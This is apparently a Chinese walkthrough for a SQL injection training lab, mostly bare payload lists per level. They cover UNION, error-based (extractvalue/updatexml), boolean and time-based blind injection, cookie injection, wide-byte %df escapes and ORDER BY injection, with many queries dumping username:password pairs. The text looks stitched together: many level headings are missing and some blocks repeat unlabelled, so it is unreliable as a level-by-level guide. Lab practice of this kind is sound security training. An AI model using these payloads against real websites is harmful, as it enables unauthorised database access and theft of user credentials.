这里建议结合第二关的剖析一起看
1.判断有无注入点
(1)在参数后分别拼接 and 1=1 与 and 1=2,对比两次页面是否不同(只看 and 1=1 正常并不能说明问题)
select * from user where name = $name and 1=1
(2)随便输入单引号、双引号等特殊字符,报错说明参数很可能被直接拼进了 SQL;但不报错不代表没有注入点,还可能是布尔盲注或延时盲注(见下文的 length()/ascii() 与 sleep() 系列 payload)
2.猜解列名数目(字段数目)
order by+数字,数字超过实际列数时会报错或页面异常
3.判断回显点
用 union select 1,2,3 ... 观察哪几个数字显示在页面上,这些位置就是回显点
4.信息收集(越多越好)
收集数据库名、表名、字段名等等
5.使用对应的SQL注入方式(联合查询、报错注入、布尔盲注、延时盲注等)
注:GET 参数中用 --+ 收尾(+ 解码后为空格,MySQL 的 -- 注释要求后面跟空格);POST 正文或 Cookie 中可直接用 #,但 # 写在 URL 里会被浏览器当成锚点截断,需写成 %23
1.第一关
//获取数据库版本
?id=-1' union select 1,version(),3 --+
//获取表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
//获取字段名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
//查询用户数据
?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
//判断出所有表名长度
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+
//逐一判断出表名
?id=1'and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
//判断出所有列名的长度
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
//逐一判断出列名
?id=1'and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
//判断出所有表名长度
?id=1"and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+
//逐一判断出表名
?id=1"and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
//判断出所有列名的长度
?id=1"and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
//逐一判断出列名
?id=1"and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
//判断出所有表名长度
?id=1'))and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+
//逐一判断出表名
?id=1'))and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
//判断出所有列名的长度
?id=1'))and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
//逐一判断出列名
?id=1'))and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
//判断出所有表名长度
?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10--+
//逐一判断出表名
?id=1'and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+
//判断出所有列名的长度
?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+
//逐一判断出列名
?id=1'and ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50--+
//先判断参数类型
?id=1' and if(1=1,sleep(5),sleep(0)) --+
//判断数据库名长度
?id=1' and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?id=1' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?id=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?id=1' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?id=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?id=1' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
10.第十关
跟第九关一致,唯一差别为数据类型为双引号
//先判断参数类型
?id=1" and if(1=1,sleep(5),sleep(0)) --+
//判断数据库名长度
?id=1" and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?id=1" and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?id=1" and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?id=1" and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?id=1" and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?id=1" and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
uname=1' union select 1,database() --+&passwd=12345&submit=Submit
//查询表名
uname=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema= 'security' --+&passwd=12345&submit=Submit
//查询字段名(users 表的列名,而非用户数据)
uname=1' union select 1,group_concat(column_name) from information_schema.columns where table_name= 'users'and table_schema= 'security'--+&passwd=12345&submit=Submit
//获取用户数据
uname=1' union select 1,(select group_concat(username,0x3a,password)from users) --+&passwd=242345&submit=Submit
uname=1") union select 1,database() --+&passwd=12345&submit=Submit
//查询表名
uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema= 'security' --+&passwd=12345&submit=Submit
//查询字段名(users 表的列名,而非用户数据)
uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_name= 'users'and table_schema= 'security'--+&passwd=12345&submit=Submit
//获取用户数据
uname=1") union select 1,(select group_concat(username,0x3a,password)from users) --+&passwd=242345&submit=Submit
uname=1') and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=12345&submit=Submit
//查询表名
uname=1') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+&passwd=12345&submit=Submit
//查询字段名(列名)
uname=1')and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+&passwd=12345&submit=Submit
//获取用户数据(注意 extractvalue/updatexml 的报错回显最多只有 32 个字符,数据较长时需配合 substr() 或 limit 分段读取)
uname=1')and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+&passwd=242345&submit=Submit
14.第十四关
跟第十三关大差不差,数据类型为双引号
//查询库名
uname=1" and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=12345&submit=Submit
//查询表名
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+&passwd=12345&submit=Submit
//查询字段名(列名)
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+&passwd=12345&submit=Submit
//获取用户数据
uname=1" and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+&passwd=242345&submit=Submit
15.第十五关
第十五关页面既无报错信息也无查询结果回显,只能通过登录成功/失败两种页面状态来判断条件真假,所以采用布尔盲注
//判断数据类型
uname=1' or 1=1--+&passwd=12345&submit=Submit
//判断数据库名的字符数
uname=1' or length((select database()))>10 --+&passwd=12345&submit=Submit
//判断数据库名的第一个字符是什么
uname=1' or ascii(mid((select database()),1,1))>115 --+&passwd=12345&submit=Submit
//判断出所有表名长度
uname=1' or length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10 --+&passwd=12345&submit=Submit
//逐一判断出表名
uname=1' or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+&passwd=12345&submit=Submit
//判断出所有列名的长度
uname=1' or length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+&passwd=12345&submit=Submit
//逐一判断出列名
uname=1' or ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50 --+&passwd=12345&submit=Submit
16.第十六关
第十六关跟十五关差不多,均为布尔注入,数据类型为双引号加括号
//判断数据类型
uname=1") or 1=1--+&passwd=12345&submit=Submit
//判断数据库名的字符数
uname=1") or length((select database()))>10 --+&passwd=12345&submit=Submit
//判断数据库名的第一个字符是什么
uname=1") or ascii(mid((select database()),1,1))>115 --+&passwd=12345&submit=Submit
//判断出所有表名长度
uname=1") or length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10 --+&passwd=12345&submit=Submit
//逐一判断出表名
uname=1") or ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99 --+&passwd=12345&submit=Submit
//判断出所有列名的长度
uname=1") or length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20 --+&passwd=12345&submit=Submit
//逐一判断出列名
uname=1") or ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>50 --+&passwd=12345&submit=Submit
//查询库名(注入点在 passwd 参数;POST 正文中 # 不是特殊字符,submit 前要补上 &,与其他关的写法保持一致)
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,database(),0x5c),1))#&submit=Submit
//查询表名
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))#&submit=Submit
//查询字段名
uname=admin&passwd=1' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5c),1))#&submit=Submit
//查找表名(该 payload 以 1', 开头、以 )# 结尾,应是拼入 INSERT ... VALUES(...) 中;若服务端返回 Column count doesn't match value count,说明 VALUES 列数与目标表不符,需按表的列数补足占位值)
1',updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))#
//查找字段名
1',updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database()),0x5c),1))#
//查找用户数据(前后拼 0x5c 保证 XPath 从第一个字符起就非法,否则报错信息会从第一个非法字符处开始,前面的数据会丢失;报错回显最多 32 个字符,长数据需用 substr() 分段)
1',updatexml(1,concat(0x5c,(select group_concat(username,0x5e,password) from users),0x5c),1))#
20.第二十关
当我们输入正确的账号密码时,页面发生变化
此时页面会弹出你的Cookie值,这里我们利用Cookie进行注入
用BP抓包,修改cookie值
Cookie: uname=-1' union select 1,2,database()#
接下来的跟之前一样
//查询表名
Cookie: uname=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' #
//查询字段名
Cookie: uname=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' #
//查询用户数据
Cookie: uname=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 #
uname=-1%df' union select 1,database() #&passwd=12345&submit=Submit
//获取表名
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=12345&submit=Submit
//获取字段名
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#&passwd=12345&submit=Submit
//查询用户数据
uname=-1%df' union select 1,(select group_concat(username,0x3a,password)from users)#&passwd=12345&submit=Submit
35.第三十五关
这里又回到了GET,但是这里为数字型(参数不在引号内,所以转义单引号的防护对它无效),基本上与33关一致
//判断字段数目(多写一列,报错即说明实际只有 3 列)
?id=-1 union select 1,2,3,4 --+
//获取数据库名
?id=-1 union select 1,database(),3 --+
//获取表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
//获取字段名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name =0x7573657273 --+
//查询用户数据
?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3 --+
36.第三十六关
与三十三关基本一致
//判断字段数量
?id=-1%df' union select 1,2,3,4 --+
//获取数据库名
?id=-1%df' union select 1,database(),3 --+
//获取表名
?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
//获取字段名
?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name =0x7573657273 --+
//查询用户数据
?id=-1%df' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
37.第三十七关
又是POST类型,与三十四题一致
//获取数据库名
uname=-1%df' union select 1,database() #&passwd=12345&submit=Submit
//获取表名
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=12345&submit=Submit
//获取字段名
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#&passwd=12345&submit=Submit
//查询用户数据
uname=-1%df' union select 1,(select group_concat(username,0x3a,password)from users)#&passwd=12345&submit=Submit
38.第三十八关
这一关并没有设防,与第一关差不多,单引号类型
//获取数据库名
?id=-1' union select 1,database(),3 --+
//获取表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
//获取字段名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
//查询用户数据
?id=-1' union select 1,(select group_concat(username,0x3a,password)from users),3 --+
39.第三十九关
至此,Page2结束,开始Page3
这一关与第二关一致,数字型
//获取数据库名
?id=-1 union select 1,database(),3
//获取表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security'
//获取字段名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users'
//查询用户数据
?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3
40.第四十关
数据类型为单引号,括号
//获取数据库名
?id=-1') union select 1,database(),3 --+
//获取表名
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' --+
//获取字段名
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users' --+
//查询用户数据
?id=-1') union select 1,(select group_concat(username,0x3a,password)from users),3 --+
41.第四十一关
和三十九关一致
//获取数据库名
?id=-1 union select 1,database(),3
//获取表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security'
//获取字段名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = 'security' and table_name = 'users'
//查询用户数据
?id=-1 union select 1,(select group_concat(username,0x3a,password)from users),3
?sort=1 and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询字段名(列名)
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
47.第四十七关
与第四十六关大抵相同,数据类型为单引号类型
//查询库名
?sort=1' and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询字段名(列名)
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
48.第四十八关
这里没有报错表现,数据类型为数字,我们用延时注入(注意 sort 参数位于 ORDER BY 中,sleep() 可能对结果集的每一行各执行一次,实际延时会是 5 秒的若干倍,可适当调小秒数)
//判断数据库名长度
?sort=1 and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1 and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1 and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1 and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1 and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
49.第四十九关
与四十八关一致,数据类型为单引号类型
//判断数据库名长度
?sort=1' and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
50.第五十关
与四十六关一致
//查询库名
?sort=1 and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询字段名(列名)
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
51.第五十一关
与五十关一致,数据类型为单引号
//查询库名
?sort=1' and extractvalue(1,concat(0x7e,(select database()))) --+
//查询表名
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
//查询字段名(列名)
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database())))--+
//获取用户数据
?sort=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users ))) --+
52.第五十二关
这一关数据类型为数字型,且没有报错表现,所以用延时注入
//判断数据库名长度
?sort=1 and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1 and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1 and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1 and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1 and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1 and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
53.第五十三关
与上一关相同,数据类型为单引号
//判断数据库名长度
?sort=1' and if(length((select database()))>8,sleep(5),sleep(0)) --+
//依次判断数据库名
?sort=1' and if(ascii(mid((select database()),1,1))>115,sleep(5),sleep(0))--+
//判断所有表名长度
?sort=1' and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断表名
?sort=1' and if(ascii(mid((select group_concat(table_name)from information_schema.tables where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+
//判断所有列名长度
?sort=1' and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database()))>10,sleep(5),sleep(0)) --+
//依次判断列名
?sort=1' and if(ascii(mid((select group_concat(column_name)from information_schema.columns where table_schema=database()),1,1))>100,sleep(5),sleep(0)) --+